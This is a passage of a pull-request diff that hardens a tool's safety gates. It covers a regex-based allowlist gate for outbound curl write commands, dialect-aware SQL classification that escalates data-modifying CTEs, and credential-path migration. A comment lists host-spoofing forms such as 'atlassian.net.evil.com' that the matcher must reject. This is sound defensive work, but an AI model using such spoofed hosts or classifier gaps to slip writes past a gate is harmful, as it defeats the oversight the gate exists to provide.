### PR TITLE
Fix 12 v2.4.0 bugs: SQL classifier, gate engine, db-guard, error classification, pg types, naming

### DIFF
--- a/docs/external-write-gating.md
+++ b/docs/external-write-gating.md
@@ -40,9 +40,17 @@ is:
 
 - `decision` is one of `deny`, `ask`, or `allow`. When several rules match the
   same command, the strictest decision wins (`deny` > `ask` > `allow`).
-- `pattern` is compiled with `new RegExp(pattern)` with **no flags**. There is
-  no inline case-insensitivity, so write case explicitly using character
-  classes (e.g. `[Pp][Oo][Ss][Tt]`) when you need it.
+- `pattern` is compiled with `new RegExp(pattern, flags)`. By default no flags
+  are applied (a rule with neither field below compiles exactly as before, so
+  character classes like `[Pp][Oo][Ss][Tt]` keep working). For
+  case-insensitivity, set `ignore_case: true` (folds in the `i` flag) instead of
+  hand-writing character classes.
+- `flags` (optional) is a string of regex flags drawn from `imsu` only (`i`
+  case-insensitive, `s` dotall, `m` multiline, `u` unicode). The `g` and `y`
+  flags are rejected: the compiled regex is reused across command segments, and
+  a global/sticky flag carries `lastIndex` between matches and would
+  intermittently miss. Under `fail_closed`, an unknown flag is a hard deny;
+  under `fail_open` the rule is skipped.
 - For `Bash`, the command is split into segments on `&&`, `||`, `;`, and `|`,
   and each segment is matched independently, so a rule fires if any segment
   matches.

--- a/plugin-hooks/dispatcher.mjs
+++ b/plugin-hooks/dispatcher.mjs
@@ -629,12 +629,18 @@ export function buildExternalWriteMatcher(rule) {
   // tolerated, so an allowlisted host cannot be spoofed via path, query,
   // userinfo, a subdomain suffix (`atlassian.net.evil.com`), or a label prefix
   // (`evil-atlassian.net`).
-  const TOKEN = `(?:^|[\\s'"=])`;
   const SCHEME = `(?:[A-Za-z][A-Za-z0-9+.\\-]*:\\/{1,2})?`;
+  const SCHEME_REQ = `(?:[A-Za-z][A-Za-z0-9+.\\-]*:\\/{1,2})`;
   const USER = `(?:[^/?#\\s'"]*@)?`;
   const SUB = `(?:[A-Za-z0-9\\-]+\\.)*`;
   const HOSTPART = `${SUB}${HOST}\\.?(?=[:/?#\\s'"]|$)`;
-  const urlHostRe = new RegExp(`${TOKEN}${SCHEME}${USER}${HOSTPART}`);
+  // Two anchors. Unquoted (line/whitespace start): scheme is optional, so curl's
+  // scheme-less default (`curl -X POST atlassian.net/api`) still matches. Quoted
+  // (`'`/`"`): a scheme is REQUIRED, so a bare allowlisted host inside a quoted
+  // query value or data arg (`"...?ref=atlassian.net"`, `"u=atlassian.net"`) no
+  // longer reads as the request host. `=` is no longer a host-start delimiter.
+  const ANCHOR = `(?:(?:^|\\s)${SCHEME}|['"]${SCHEME_REQ})`;
+  const urlHostRe = new RegExp(`${ANCHOR}${USER}${HOSTPART}`);
   // Command names are matched case-insensitively (a case-insensitive
   // filesystem resolves `CURL`/`HTTP` to the real binary). The verb and data
   // flags below stay case-sensitive on purpose, so `-X` is not confused with

--- a/plugin-hooks/dispatcher.mjs
+++ b/plugin-hooks/dispatcher.mjs
@@ -630,16 +630,16 @@ export function buildExternalWriteMatcher(rule) {
   // userinfo, a subdomain suffix (`atlassian.net.evil.com`), or a label prefix
   // (`evil-atlassian.net`).
   const SCHEME = `(?:[A-Za-z][A-Za-z0-9+.\\-]*:\\/{1,2})?`;
-  const SCHEME_REQ = `(?:[A-Za-z][A-Za-z0-9+.\\-]*:\\/{1,2})`;
   const USER = `(?:[^/?#\\s'"]*@)?`;
   const SUB = `(?:[A-Za-z0-9\\-]+\\.)*`;
   const HOSTPART = `${SUB}${HOST}\\.?(?=[:/?#\\s'"]|$)`;
-  // Two anchors. Unquoted (line/whitespace start): scheme is optional, so curl's
-  // scheme-less default (`curl -X POST atlassian.net/api`) still matches. Quoted
-  // (`'`/`"`): a scheme is REQUIRED, so a bare allowlisted host inside a quoted
-  // query value or data arg (`"...?ref=atlassian.net"`, `"u=atlassian.net"`) no
-  // longer reads as the request host. `=` is no longer a host-start delimiter.
-  const ANCHOR = `(?:(?:^|\\s)${SCHEME}|['"]${SCHEME_REQ})`;
+  // The host must start at a line/whitespace start or immediately after a quote
+  // (with an optional scheme; curl accepts a scheme-less host, including quoted
+  // `'atlassian.net/x'`). `=` is deliberately NOT a host-start delimiter, so a
+  // bare allowlisted host appearing after `key=` in a query value or `-d` body
+  // (`...?ref=atlassian.net`, `-d 'u=atlassian.net'`) does not read as the
+  // request host — the quote there precedes `key`, not the host.
+  const ANCHOR = `(?:^|[\\s'"])${SCHEME}`;
   const urlHostRe = new RegExp(`${ANCHOR}${USER}${HOSTPART}`);
   // Command names are matched case-insensitively (a case-insensitive
   // filesystem resolves `CURL`/`HTTP` to the real binary). The verb and data

--- a/plugin-hooks/dispatcher.mjs
+++ b/plugin-hooks/dispatcher.mjs
@@ -563,6 +563,19 @@ function escapeRe(s) {
   return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
 }
 
+// Resolve optional case/flag controls for a pattern rule. Returns
+// { flags } on success or { error: true } for an unknown flag (the caller
+// fails closed). Backward compatible: a rule with neither field -> "".
+// `g` and `y` are deliberately disallowed: the compiled regex is reused
+// across every command segment, and a sticky/global flag carries `lastIndex`
+// between `.test()` calls, so it would intermittently miss and fail open.
+function resolveRuleFlags(rule) {
+  let flags = typeof rule.flags === "string" ? rule.flags : "";
+  if (flags && !/^[imsu]*$/.test(flags)) return { error: true };
+  if (rule.ignore_case === true && !flags.includes("i")) flags += "i";
+  return { flags };
+}
+
 // Turn a literal string into a case-insensitive regex fragment via character
 // classes. Used for verbs and hostnames so the matcher needs no global `i`
 // flag (which would wrongly conflate curl's case-sensitive `-X` method flag
@@ -723,8 +736,18 @@ export function applyGatesManifest(manifest, source, text, disabled, decisions, 
       }
     } else {
       if (typeof rule.pattern !== "string") continue;
+      const fr = resolveRuleFlags(rule);
+      if (fr.error) {
+        if (enforcement === "fail_closed") {
+          decisions.push({
+            decision: "deny",
+            reason: `fail-closed enforcement: ${source} gate rule '${rule.name ?? "rule"}' has unknown regex flags`,
+          });
+        }
+        continue;
+      }
       let re;
-      try { re = new RegExp(expandPattern(rule.pattern)); } catch {
+      try { re = new RegExp(expandPattern(rule.pattern), fr.flags); } catch {
         if (enforcement === "fail_closed") {
           decisions.push({
             decision: "deny",

--- a/src/connectors/db/connector.ts
+++ b/src/connectors/db/connector.ts
@@ -188,6 +188,7 @@ function mapDbErrorCode(internal: string): import("narai-primitives/toolkit").Er
   if (upper === "NOT_FOUND") return "NOT_FOUND";
   if (upper === "TIMEOUT") return "TIMEOUT";
   if (upper === "RATE_LIMITED") return "RATE_LIMITED";
+  if (upper === "SQL_ERROR") return "VALIDATION_ERROR";
   if (upper === "SCHEMA_ERROR" || upper.endsWith("_ERROR")) return "CONNECTION_ERROR";
   return "CONNECTION_ERROR";
 }

--- a/src/connectors/db/dispatcher.ts
+++ b/src/connectors/db/dispatcher.ts
@@ -29,7 +29,9 @@ import { loadResolvedConfig } from "narai-primitives/config";
 import {
   Policy,
   classifyStatements,
+  normalizeDialect,
   type OperationType,
+  type SqlDialect,
 } from "./lib/policy.js";
 import { executeQuery, type QueryableDriver } from "./lib/query.js";
 import {
@@ -215,10 +217,11 @@ export function _preCheckPolicy(
   approvalMode: string,
   rules: PolicyRules,
   grantStore?: GrantStore,
+  dialect: SqlDialect = "generic",
 ): { response: FetchResult; exitCode: number } | null {
   let ops: OperationType[];
   try {
-    ops = classifyStatements(sql);
+    ops = classifyStatements(sql, dialect);
   } catch {
     ops = ["admin"];
   }
@@ -239,8 +242,8 @@ export function _preCheckPolicy(
   try {
     policy =
       grantStore !== undefined
-        ? new Policy(approvalMode, rules, grantStore)
-        : new Policy(approvalMode, rules);
+        ? new Policy(approvalMode, rules, grantStore, dialect)
+        : new Policy(approvalMode, rules, undefined, dialect);
   } catch (e) {
     return {
       response: {
@@ -514,7 +517,7 @@ async function runQueryOnSqlite(v: QueryParamsValidated): Promise<FetchResult> {
   const driver = new SQLiteDriver();
   const conn = driver.connect({ database: v.sqlite_path! });
   try {
-    const policy = new Policy(v.approval_mode ?? "auto", DEFAULT_POLICY);
+    const policy = new Policy(v.approval_mode ?? "auto", DEFAULT_POLICY, undefined, "sqlite");
     const queryable = adaptDriver(driver, conn);
     return await executeQuery(queryable, v.sql, policy, {
       max_rows: v.max_rows,
@@ -563,6 +566,7 @@ async function runOnEnv(
   let approvalMode: string;
   let rules: PolicyRules;
   let grantDurationHours: number | undefined;
+  let driverName: string | undefined;
 
   try {
     if (pluginCfg !== null) {
@@ -630,6 +634,7 @@ async function runOnEnv(
         qv.approval_mode ?? env.approval_mode.replace(/-/g, "_");
       rules = env.policy ?? DEFAULT_POLICY;
       grantDurationHours = env.grant_duration_hours;
+      driverName = env.driver;
     } else {
       if (v.server === undefined) {
         return {
@@ -646,6 +651,7 @@ async function runOnEnv(
       approvalMode = qv.approval_mode ?? resolved.approval_mode;
       rules = DEFAULT_POLICY;
       grantDurationHours = resolved.grant_duration_hours;
+      driverName = resolved.driver;
     }
   } catch (e) {
     clearEnvironments();
@@ -690,12 +696,17 @@ async function runOnEnv(
     }
   }
 
+  // Map the configured driver to a SQL dialect so the policy splitter/
+  // classifier can disambiguate dialect-specific constructs (e.g. Postgres
+  // `ARRAY[...]`). Unknown drivers fall back to the safe `"generic"` posture.
+  const dialect = normalizeDialect(driverName);
+
   // Pre-connect policy gate: short-circuit deny/escalate/present_only
   // before we load any driver or open any connection. This is the
   // load-bearing invariant documented in CLAUDE.md and the plugin spec.
   if (action === "query") {
     const q = v as QueryParamsValidated;
-    const short = _preCheckPolicy(q.sql, approvalMode, rules, grantStore);
+    const short = _preCheckPolicy(q.sql, approvalMode, rules, grantStore, dialect);
     if (short !== null) {
       clearEnvironments();
       return short.response;
@@ -731,8 +742,8 @@ async function runOnEnv(
     // use the default in-process store.
     const policy =
       grantStore !== undefined
-        ? new Policy(approvalMode, rules, grantStore)
-        : new Policy(approvalMode, rules);
+        ? new Policy(approvalMode, rules, grantStore, dialect)
+        : new Policy(approvalMode, rules, undefined, dialect);
     const queryable = adaptDriver(conn.driver, conn.native);
     return await executeQuery(queryable, qv.sql, policy, {
       max_rows: qv.max_rows,

--- a/src/connectors/db/lib/credentials.ts
+++ b/src/connectors/db/lib/credentials.ts
@@ -16,10 +16,11 @@
  * from the Python port so existing tests pass verbatim.
  */
 import * as fs from "node:fs";
-import * as os from "node:os";
 import * as path from "node:path";
 
 import { FileProvider, EnvVarProvider } from "narai-primitives/credentials";
+
+import { configBaseDir, envVarPrefix } from "./naming.js";
 
 /**
  * Default credentials file location — `~/.config/wiki_db/credentials.json`.
@@ -29,7 +30,7 @@ import { FileProvider, EnvVarProvider } from "narai-primitives/credentials";
  * not work in strict-ESM, so we expose `.path` instead.
  */
 export const _DEFAULT_CREDS = {
-  path: path.join(os.homedir(), ".config", "wiki_db", "credentials.json"),
+  path: path.join(configBaseDir(), "credentials.json"),
 };
 
 /** Abstract base class — mirrors Python's ABC + `@abstractmethod`. */
@@ -91,8 +92,20 @@ export class FileCredentialProvider extends CredentialProvider {
  * Delegates to the shared `EnvVarProvider` so the env lookup logic lives
  * in a single place.
  */
+export interface EnvVarCredentialProviderOptions {
+  /** Opt-in override for the env-var prefix (default: resolved at runtime). */
+  prefix?: string;
+}
+
 export class EnvVarCredentialProvider extends CredentialProvider {
-  private readonly _inner = new EnvVarProvider({ prefix: "WIKI_DB_" });
+  private readonly _prefix: string;
+  private readonly _inner: EnvVarProvider;
+
+  constructor(opts: EnvVarCredentialProviderOptions = {}) {
+    super();
+    this._prefix = envVarPrefix(opts.prefix);
+    this._inner = new EnvVarProvider({ prefix: this._prefix });
+  }
 
   override get(env: string): [string, string] {
     const envUpper = env.toUpperCase();
@@ -100,8 +113,8 @@ export class EnvVarCredentialProvider extends CredentialProvider {
     const password = this._inner.getSecretSync(`${envUpper}_PASSWORD`);
     if (user === null || password === null) {
       const missing: string[] = [];
-      if (user === null) missing.push(`WIKI_DB_${envUpper}_USER`);
-      if (password === null) missing.push(`WIKI_DB_${envUpper}_PASSWORD`);
+      if (user === null) missing.push(`${this._prefix}${envUpper}_USER`);
+      if (password === null) missing.push(`${this._prefix}${envUpper}_PASSWORD`);
       const err = new Error(
         `Missing environment variable(s): ${missing.join(", ")}`,
       );

--- a/src/connectors/db/lib/drivers/mysql.ts
+++ b/src/connectors/db/lib/drivers/mysql.ts
@@ -330,7 +330,7 @@ export class MysqlDriver extends DatabaseDriver {
   }
 
   override classifyOperation(query: string): OperationType {
-    return classifySqlKeywords(query);
+    return classifySqlKeywords(query, "mysql");
   }
 
   async closeAsync(conn: unknown): Promise<void> {

--- a/src/connectors/db/lib/drivers/oracle.ts
+++ b/src/connectors/db/lib/drivers/oracle.ts
@@ -444,7 +444,7 @@ export class OracleDriver extends DatabaseDriver {
   }
 
   override classifyOperation(query: string): OperationType {
-    return classifySqlKeywords(query);
+    return classifySqlKeywords(query, "oracle");
   }
 
   async closeAsync(conn: unknown): Promise<void> {

--- a/src/connectors/db/lib/drivers/postgresql.ts
+++ b/src/connectors/db/lib/drivers/postgresql.ts
@@ -46,8 +46,76 @@ interface PgPool {
   connect(): Promise<PgClient>;
   end(): Promise<void>;
 }
+
+/**
+ * Shape of node-pg's per-Pool `types` option: an object exposing
+ * `getTypeParser(oid, format)`. node-pg delegates any OID we do not
+ * override to its built-in `pg-types`, so a partial map is safe.
+ */
+interface TypeParsers {
+  getTypeParser(oid: number, format?: string): (v: string) => unknown;
+}
+
 interface PgModule {
   Pool: new (config: Record<string, unknown>) => PgPool;
+  types: TypeParsers;
+}
+
+/**
+ * Build a per-Pool node-pg type-parser object from opt-in result-coercion
+ * extras. All extras default to today's behavior; with none present this
+ * returns `undefined` so the pool config stays byte-identical to the
+ * pre-existing path (full backward compatibility).
+ *
+ * Extras (all read from the environment `extras` bag):
+ *  - `bigint_mode`: "string" (default) | "number" | "bigint".
+ *    "number" coerces int8 (OID 20) to a Number only when the value is a
+ *    safe integer; out-of-range values are preserved exactly as
+ *    `{ __bigint__: <text> }` so precision is never silently lost.
+ *    "bigint" returns a native BigInt (in-process consumers only — not
+ *    JSON-serializable).
+ *  - `numeric_mode`: "string" (default) | "number". "number" coerces
+ *    numeric/decimal (OID 1700) to a Number (lossy for high-precision
+ *    decimals — opt-in only).
+ *  - `bytea_encoding`: "buffer" (default) | "hex" | "base64". Reuses the
+ *    default Buffer parser, then `.toString(encoding)`.
+ *
+ * `base` is injected (node-pg's `types` in production, a stub in tests) so
+ * delegation and bytea decoding stay testable without a live database.
+ */
+export function buildTypeParsers(
+  config: Record<string, unknown>,
+  base: TypeParsers,
+): TypeParsers | undefined {
+  const bigintMode = config["bigint_mode"];
+  const numericMode = config["numeric_mode"];
+  const byteaEncoding = config["bytea_encoding"];
+  const overrides: Record<number, (v: string) => unknown> = {};
+
+  if (bigintMode === "number") {
+    overrides[20] = (v) => {
+      const n = Number(v);
+      return Number.isSafeInteger(n) ? n : { __bigint__: v };
+    };
+  } else if (bigintMode === "bigint") {
+    overrides[20] = (v) => BigInt(v);
+  }
+
+  if (numericMode === "number") {
+    overrides[1700] = (v) => Number(v);
+  }
+
+  if (byteaEncoding === "hex" || byteaEncoding === "base64") {
+    overrides[17] = (v) =>
+      (base.getTypeParser(17, "text")(v) as Buffer).toString(byteaEncoding);
+  }
+
+  if (Object.keys(overrides).length === 0) return undefined;
+  return {
+    getTypeParser(oid, format) {
+      return overrides[oid] ?? base.getTypeParser(oid, format ?? "text");
+    },
+  };
 }
 
 // ---------------------------------------------------------------------------
@@ -136,6 +204,9 @@ export class PostgresDriver extends DatabaseDriver {
       if (user !== undefined) poolConfig["user"] = user;
       if (password !== undefined) poolConfig["password"] = password;
       if (ssl !== undefined) poolConfig["ssl"] = ssl;
+
+      const parsers = buildTypeParsers(envConfig, pg.types);
+      if (parsers !== undefined) poolConfig["types"] = parsers;
 
       const pool = new pg.Pool(poolConfig);
       this._pool = pool;

--- a/src/connectors/db/lib/drivers/postgresql.ts
+++ b/src/connectors/db/lib/drivers/postgresql.ts
@@ -354,7 +354,7 @@ export class PostgresDriver extends DatabaseDriver {
   }
 
   override classifyOperation(query: string): OperationType {
-    return classifySqlKeywords(query);
+    return classifySqlKeywords(query, "postgres");
   }
 
   async closeAsync(conn: unknown): Promise<void> {

--- a/src/connectors/db/lib/drivers/sqlite.ts
+++ b/src/connectors/db/lib/drivers/sqlite.ts
@@ -176,7 +176,7 @@ export class SQLiteDriver extends DatabaseDriver {
   }
 
   override classifyOperation(query: string): OperationType {
-    return classifySqlKeywords(query);
+    return classifySqlKeywords(query, "sqlite");
   }
 }
 

--- a/src/connectors/db/lib/drivers/sqlserver.ts
+++ b/src/connectors/db/lib/drivers/sqlserver.ts
@@ -390,7 +390,7 @@ export class SqlServerDriver extends DatabaseDriver {
   }
 
   override classifyOperation(query: string): OperationType {
-    return classifySqlKeywords(query);
+    return classifySqlKeywords(query, "sqlserver");
   }
 
   async closeAsync(_conn: unknown): Promise<void> {

--- a/src/connectors/db/lib/grant-store.ts
+++ b/src/connectors/db/lib/grant-store.ts
@@ -21,8 +21,9 @@
  * `grant_required`.
  */
 import * as fs from "node:fs";
-import * as os from "node:os";
 import * as path from "node:path";
+
+import { configBaseDir } from "./naming.js";
 
 /**
  * Storage contract for grant expiries. Keys are grant types (only `"read"`
@@ -138,9 +139,9 @@ export class FileGrantStore implements GrantStore {
  * `staging` must not unlock `prod`. The alias is sanitized to a filesystem-
  * safe token so arbitrary server names cannot escape the grants directory.
  */
-export function grantStorePathFor(serverName: string): string {
+export function grantStorePathFor(serverName: string, baseDir?: string): string {
   const safe = serverName.replace(/[^A-Za-z0-9_.-]/g, "_") || "_";
-  return path.join(os.homedir(), ".config", "wiki_db", "grants", `${safe}.json`);
+  return path.join(configBaseDir(baseDir), "grants", `${safe}.json`);
 }
 
 /**

--- a/src/connectors/db/lib/naming.ts
+++ b/src/connectors/db/lib/naming.ts
@@ -1,0 +1,38 @@
+/**
+ * naming.ts — migration-safe resolution of the connector's config base
+ * directory and env-var prefix.
+ *
+ * Resolution order (both helpers):
+ *   1. explicit override (opt-in)
+ *   2. legacy location/prefix when it is already in use (so existing
+ *      adopters never silently lose credentials, grants, or env vars)
+ *   3. neutral default
+ *
+ * The legacy names are retained only as a fallback; new users get the
+ * neutral default.
+ */
+import * as fs from "node:fs";
+import * as os from "node:os";
+import * as path from "node:path";
+
+const LEGACY_DIR = "wiki_db";
+const NEUTRAL_DIR = path.join("narai", "db");
+const LEGACY_ENV_PREFIX = "WIKI_DB_";
+const NEUTRAL_ENV_PREFIX = "NARAI_DB_";
+
+/** Config base dir: explicit override > legacy if it exists > neutral default. */
+export function configBaseDir(override?: string): string {
+  if (override !== undefined) return override;
+  const legacy = path.join(os.homedir(), ".config", LEGACY_DIR);
+  if (fs.existsSync(legacy)) return legacy;
+  return path.join(os.homedir(), ".config", NEUTRAL_DIR);
+}
+
+/** Env prefix: explicit override > legacy if any WIKI_DB_* var is set > neutral. */
+export function envVarPrefix(override?: string): string {
+  if (override !== undefined) return override;
+  const hasLegacy = Object.keys(process.env).some((k) =>
+    k.startsWith(LEGACY_ENV_PREFIX),
+  );
+  return hasLegacy ? LEGACY_ENV_PREFIX : NEUTRAL_ENV_PREFIX;
+}

--- a/src/connectors/db/lib/policy.ts
+++ b/src/connectors/db/lib/policy.ts
@@ -57,6 +57,57 @@ export const OperationType = {
   PRIVILEGE: "privilege" as const,
 } satisfies Record<string, OperationType>;
 
+/**
+ * SQL dialect used to disambiguate constructs that are parsed differently
+ * across engines. `"generic"` is the default safe posture: it keeps the
+ * strictest interpretation (e.g. `[` is treated as an ambiguous SQL Server
+ * bracket-quoted identifier and rejected). Only the dialects where `[` is
+ * ordinary syntax (Postgres array literals/casts, etc.) relax that guard.
+ */
+export type SqlDialect =
+  | "sqlserver"
+  | "postgres"
+  | "mysql"
+  | "sqlite"
+  | "oracle"
+  | "generic";
+
+/**
+ * Normalize a driver/dialect string into a `SqlDialect`. Unknown values fall
+ * back to `"generic"` (the safe posture) so a config can never disable a guard
+ * by choosing an unmapped alias.
+ */
+export function normalizeDialect(driver: string | undefined): SqlDialect {
+  switch ((driver ?? "").toLowerCase()) {
+    case "sqlserver":
+    case "mssql":
+      return "sqlserver";
+    case "postgres":
+    case "postgresql":
+      return "postgres";
+    case "mysql":
+      return "mysql";
+    case "sqlite":
+      return "sqlite";
+    case "oracle":
+    case "oracledb":
+    case "oci":
+      return "oracle";
+    default:
+      return "generic";
+  }
+}
+
+/**
+ * Whether `[` should be treated as an (ambiguous) identifier-quote opener and
+ * rejected. Only SQL Server uses bracket-quoted identifiers; `"generic"`
+ * (unknown driver) also fails closed. For Postgres/MySQL/SQLite/Oracle, `[`
+ * is ordinary syntax (array literals/subscripts) and is allowed.
+ */
+function _bracketsAreIdentifierQuotes(dialect: SqlDialect): boolean {
+  return dialect === "sqlserver" || dialect === "generic";
+}
+
 /** Discriminated union: `formatted_sql` is REQUIRED only when decision === "present_only". */
 export type PolicyResult =
   | { decision: "allow"; reason: string }
@@ -82,7 +133,7 @@ const _DECISION_RANK: Record<Decision, number> = {
 // -----------------------------------------------------------------------
 
 const _READ_KEYWORDS: ReadonlySet<string> = new Set([
-  "SELECT", "EXPLAIN", "SHOW", "DESCRIBE", "DESC", "WITH",
+  "SELECT", "EXPLAIN", "SHOW", "DESCRIBE", "DESC", "WITH", "VALUES", "TABLE",
 ]);
 const _WRITE_KEYWORDS: ReadonlySet<string> = new Set([
   "INSERT", "UPDATE", "REPLACE", "MERGE", "UPSERT",
@@ -107,8 +158,11 @@ const _PRIVILEGE_KEYWORDS: ReadonlySet<string> = new Set([
  * Default-deny: any unknown first-word falls through to `ADMIN` (most
  * restrictive), matching `policy.py`'s safety-floor intent.
  */
-export function classifySqlKeywords(sql: string): OperationType {
-  const cleaned = Policy._stripComments(sql).trim();
+export function classifySqlKeywords(
+  sql: string,
+  dialect: SqlDialect = "generic",
+): OperationType {
+  const cleaned = Policy._stripComments(sql, dialect).trim();
   if (!cleaned) {
     throw new Error("Empty SQL statement");
   }
@@ -119,6 +173,20 @@ export function classifySqlKeywords(sql: string): OperationType {
   if (_ADMIN_KEYWORDS.has(firstWord)) return OperationType.ADMIN;
   if (_DELETE_KEYWORDS.has(firstWord)) return OperationType.DELETE;
   if (_WRITE_KEYWORDS.has(firstWord)) return OperationType.WRITE;
+
+  // A data-modifying CTE leads with WITH but can contain a write/delete/admin
+  // inside its body (e.g. `WITH x AS (DELETE FROM t RETURNING *) SELECT ...`).
+  // Scan the string-masked statement so keywords inside string literals are
+  // ignored, and escalate to the strictest contained op.
+  if (firstWord === "WITH") {
+    const masked = Policy._maskStringLiterals(cleaned).toUpperCase();
+    if (/\b(GRANT|REVOKE)\b/.test(masked)) return OperationType.PRIVILEGE;
+    if (/\b(CREATE|DROP|ALTER|RENAME)\b/.test(masked)) return OperationType.ADMIN;
+    if (/\b(DELETE|TRUNCATE)\b/.test(masked)) return OperationType.DELETE;
+    if (/\b(INSERT|UPDATE|REPLACE|MERGE|UPSERT)\b/.test(masked)) return OperationType.WRITE;
+    return OperationType.READ;
+  }
+
   if (_READ_KEYWORDS.has(firstWord)) return OperationType.READ;
 
   return OperationType.ADMIN;
@@ -179,7 +247,11 @@ function _isExecCommentStart(sql: string, i: number): boolean {
   return false;
 }
 
-function _boundarySemicolons(sql: string, treatBackslashAsEscape: boolean): Set<number> {
+function _boundarySemicolons(
+  sql: string,
+  treatBackslashAsEscape: boolean,
+  dialect: SqlDialect = "generic",
+): Set<number> {
   const boundaries = new Set<number>();
   let inString: string | null = null; // Either null, "'", '"', or '`'
 
@@ -197,7 +269,7 @@ function _boundarySemicolons(sql: string, treatBackslashAsEscape: boolean): Set<
         i++; // skip escaped char like \'
       }
     } else {
-      if (c === "[" || _isExecCommentStart(sql, i)) {
+      if ((c === "[" && _bracketsAreIdentifierQuotes(dialect)) || _isExecCommentStart(sql, i)) {
         throw new Error("Ambiguous or unrecognized SQL construct");
       }
       if (c === "'" || c === '"' || c === "`") {
@@ -228,11 +300,11 @@ function _boundarySemicolons(sql: string, treatBackslashAsEscape: boolean): Set<
  * and backslash-as-escape semantics. If the two modes disagree on statement
  * boundaries, the function fails closed and throws an error.
  */
-function _splitStatements(sql: string): string[] {
-  const cleaned = Policy._stripComments(sql);
+function _splitStatements(sql: string, dialect: SqlDialect = "generic"): string[] {
+  const cleaned = Policy._stripComments(sql, dialect);
 
-  const b1 = _boundarySemicolons(cleaned, false);
-  const b2 = _boundarySemicolons(cleaned, true);
+  const b1 = _boundarySemicolons(cleaned, false, dialect);
+  const b2 = _boundarySemicolons(cleaned, true, dialect);
 
   if (b1.size !== b2.size) {
     throw new Error("Ambiguous SQL statement boundaries");
@@ -273,12 +345,15 @@ function _splitStatements(sql: string): string[] {
  * A compound of all reads classifies as [READ, READ, ...] and the aggregate
  * decision is allow.
  */
-export function classifyStatements(sql: string): OperationType[] {
-  const stmts = _splitStatements(sql);
+export function classifyStatements(
+  sql: string,
+  dialect: SqlDialect = "generic",
+): OperationType[] {
+  const stmts = _splitStatements(sql, dialect);
   if (stmts.length === 0) {
     throw new Error("Empty SQL statement");
   }
-  return stmts.map((s) => classifySqlKeywords(s));
+  return stmts.map((s) => classifySqlKeywords(s, dialect));
 }
 
 
@@ -325,11 +400,15 @@ export class Policy {
   // G-DB-AUDIT: grant_types that have already had a `grant_expired` event
   // emitted (de-dupes spam from repeated isGrantActive polling).
   private readonly _expired_logged: Set<string>;
+  // SQL dialect used to disambiguate constructs like `[` during splitting and
+  // classification. Defaults to the safe `"generic"` posture.
+  private readonly _dialect: SqlDialect;
 
   constructor(
     approvalMode: string = "auto",
     rules: PolicyRules = DEFAULT_POLICY,
     grantStore: GrantStore = new MemoryGrantStore(),
+    dialect: SqlDialect = "generic",
   ) {
     if (!_VALID_APPROVAL_MODES.has(approvalMode as ApprovalMode)) {
       // Match Python repr(): single-quoted string.
@@ -340,6 +419,7 @@ export class Policy {
     this._session_approved = false;
     this._grants = grantStore;
     this._expired_logged = new Set();
+    this._dialect = dialect;
   }
 
   // ------------------------------------------------------------------
@@ -357,7 +437,7 @@ export class Policy {
    * vs treating `\` as escape). If the two modes disagree on what constitutes
    * a comment, it fails closed and throws an error.
    */
-  static _stripComments(sql: string): string {
+  static _stripComments(sql: string, dialect: SqlDialect = "generic"): string {
     const isComment1 = new Array<boolean>(sql.length).fill(false);
     const isComment2 = new Array<boolean>(sql.length).fill(false);
 
@@ -381,7 +461,7 @@ export class Policy {
           // (which would delete a following `;` and hide a statement).
           i = _dollarQuoteEnd(sql, i) - 1;
         } else {
-          if (c === "[" || _isExecCommentStart(sql, i)) {
+          if ((c === "[" && _bracketsAreIdentifierQuotes(dialect)) || _isExecCommentStart(sql, i)) {
             throw new Error("Ambiguous or unrecognized SQL construct");
           }
           if (c === "'" || c === '"' || c === "`") {
@@ -437,7 +517,7 @@ export class Policy {
 
   /** Determine the OperationType of a raw SQL string. */
   classifySql(sql: string): OperationType {
-    return classifySqlKeywords(sql);
+    return classifySqlKeywords(sql, this._dialect);
   }
 
   // ------------------------------------------------------------------
@@ -539,14 +619,14 @@ export class Policy {
     // all-allowed statements stays allowed.
     let classifications: OperationType[];
     try {
-      classifications = classifyStatements(stripped);
+      classifications = classifyStatements(stripped, this._dialect);
     } catch (exc) {
       const reason = (exc as Error).message;
       _emitDeny(reason, null);
       return { decision: "deny", reason };
     }
 
-    const statements = _splitStatements(stripped);
+    const statements = _splitStatements(stripped, this._dialect);
     const perStmt: Array<{ stmt: string; op: OperationType; result: PolicyResult }> = [];
     for (let i = 0; i < statements.length; i++) {
       const stmt = statements[i]!;
@@ -600,15 +680,23 @@ export class Policy {
    */
   private _decideOne(stmt: string, op: OperationType): PolicyResult {
     const rule = this._rules[op];
+    // Issue #9: an unrecognized leading keyword falls through to the ADMIN
+    // safety floor. Keep the strict decision, but tag the reason so the
+    // operator isn't told it was a genuine ADMIN statement.
+    const unrecognizedAdmin =
+      op === OperationType.ADMIN && _isUnrecognizedLeading(stmt, this._dialect);
     if (rule === "deny") {
-      return { decision: "deny", reason: _denyReason(op) };
+      const reason = unrecognizedAdmin ? _unrecognizedReason() : _denyReason(op);
+      return { decision: "deny", reason };
     }
     if (rule === "escalate") {
-      return { decision: "escalate", reason: _escalateReason(op) };
+      const reason = unrecognizedAdmin ? _unrecognizedReason() : _escalateReason(op);
+      return { decision: "escalate", reason };
     }
     if (rule === "present") {
       const formatted = _formatStatement(stmt);
-      return { decision: "present_only", reason: _presentReason(op), formatted_sql: formatted };
+      const reason = unrecognizedAdmin ? _unrecognizedReason() : _presentReason(op);
+      return { decision: "present_only", reason, formatted_sql: formatted };
     }
     // rule === "allow"
     if (op === OperationType.READ) {
@@ -812,6 +900,32 @@ function _denyReason(op: OperationType): string {
 
 function _escalateReason(op: OperationType): string {
   return `${op.toUpperCase()} statements require approval`;
+}
+
+/**
+ * Issue #9: reason for a statement whose leading keyword matched no known
+ * keyword set. It is classified as ADMIN (the most restrictive floor), so the
+ * decision is unchanged, but this message distinguishes it from a genuine
+ * recognized ADMIN statement (e.g. a typo like `SELEKT 1`).
+ */
+function _unrecognizedReason(): string {
+  return "Unrecognized leading keyword -- classified as ADMIN (most restrictive)";
+}
+
+/**
+ * True when the leading keyword of `stmt` is in none of the known keyword
+ * sets — i.e. it reached the ADMIN safety floor via fallthrough rather than a
+ * real ADMIN keyword.
+ */
+function _isUnrecognizedLeading(stmt: string, dialect: SqlDialect): boolean {
+  const w = (Policy._stripComments(stmt, dialect).trim().split(/\s+/)[0] ?? "").toUpperCase();
+  return !(
+    _READ_KEYWORDS.has(w) ||
+    _WRITE_KEYWORDS.has(w) ||
+    _DELETE_KEYWORDS.has(w) ||
